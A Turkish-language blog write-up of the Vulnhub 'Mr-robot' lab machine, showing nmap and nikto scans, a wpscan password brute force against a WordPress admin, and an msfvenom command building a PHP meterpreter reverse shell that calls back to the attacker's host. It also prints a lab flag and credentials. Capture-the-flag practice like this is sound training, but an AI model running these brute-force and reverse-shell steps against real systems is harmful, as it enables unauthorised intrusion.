Vulnhub Mr-robot Writeup

Bu yazımızda sizlerle beraber Vulnhub’da bulunan Mr-robot isimli zafiyetli makinenin çözümünü göstereceğiz.

İlk başta Mr-robot makinemizin ip adresini tespit edelim.

sudo nmap -sn 192.168.216.0/24

Hedef makinemizin ip adresini bulduk. “192.168.216.128” ip adresine sahip. Hemen nmap aracı ile hedef makinemiz üzerinde hızlı bir tarama yapalım.

sudo nmap -A  -T4 192.168.216.128
Mr-robot
Nmap Çıktısı

Makinemizin üzerinde 80 ve 443 portu açık ve Apache çalışıyor. Web servisi olabilir diye tarayıcımızdan bakalım.

Mr-robot
Tarayıcı çıktısı

Ardından nikto ile tarama yapalım. Komutumuz aşağıdaki gibidir.

nikto -h 92.168.216.128
Mr-robot
Nikto Çıktısı

Tarama sonucumuzda hedefimizin wordpress olduğunu ve sitede robots.txt dosyasını bulduk. WordPress olduğu için wpscan taraması başlatalım. Bu arada robots.txt üstünde ne var bakalım.

wpscan --url 192.168.216.128 -e
Mr-robot
Robots.txt Görüntüsü

fsocity.dic ve key-1-of-3.txt dosyalarına bakalım. fsocity.dic dosyamızı indirdik. key-1-of-3.txt dosyamızda böyle bir hash verdi. Ve key-1-of-3.txt ile bulmamız gereken 3 hash olduğunu anlıyoruz. 1. hash aşağıda.

073403c8a58a1f80d943455fb30724b9
Mr-robot
Wpscan Çıktısı

Az önce bulduğumuz hash değerini hash-identifier aracı ile bakalım

Mr-robot
Hash-identifier Çıktısı

İndirdiğimiz fsocity.dic dosyanın içine baktığımızda bir wordlist olduğunu görüyoruz. Bunun üstüne admin paneline brute force uygulamaya deniyelim. Username’in elliot olduğunu wpscan taramasında görmüştük.

wpscan --url 192.168.216.128 --passwords /home/kali/Downloads/fsocity.dic --usernames elliot

Kodumuzu yazdık sisteme brute-force deniyoruz. Taramamız bitti ve Kullanıcı adı ve şifremiz.

Mr-robot

WordPress admin panelini açtık. PHP shell deniyelim.

msfvenom -p php/meterpreter/reverse_tcp  LHOST=192.168.216.129 LPORT=5555 -f raw > /home/kali/Desktop/shell.php

Shellimizi oluşturduk. Panelimize bunu yükledik şimdi msfconsole ile bağlantı atalım.

Mr-robot

Sitemiz üstünden attığımız shell dosyasının linkini açalım ve bağlantı kurulsun.

Mr-robot

Yeni bir hash bulduk bakalım ne demekmiş.

abcdefghijklmnopqrstuvwxyz

Makinemizin kullanıcı adını :robot şifresinide :abcdefghijklmnopqrstuvwxyz olarak bulduk. Artık makinenin içindeyiz.

Mr-robot

Son işlemimiz 3. key dosyasını bulmak.

Mr-robot

3. hash dosyamızıda bulmuş olduk ve makinemizi çözdük. Bir sonraki yazımızda görüşmek üzere…

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir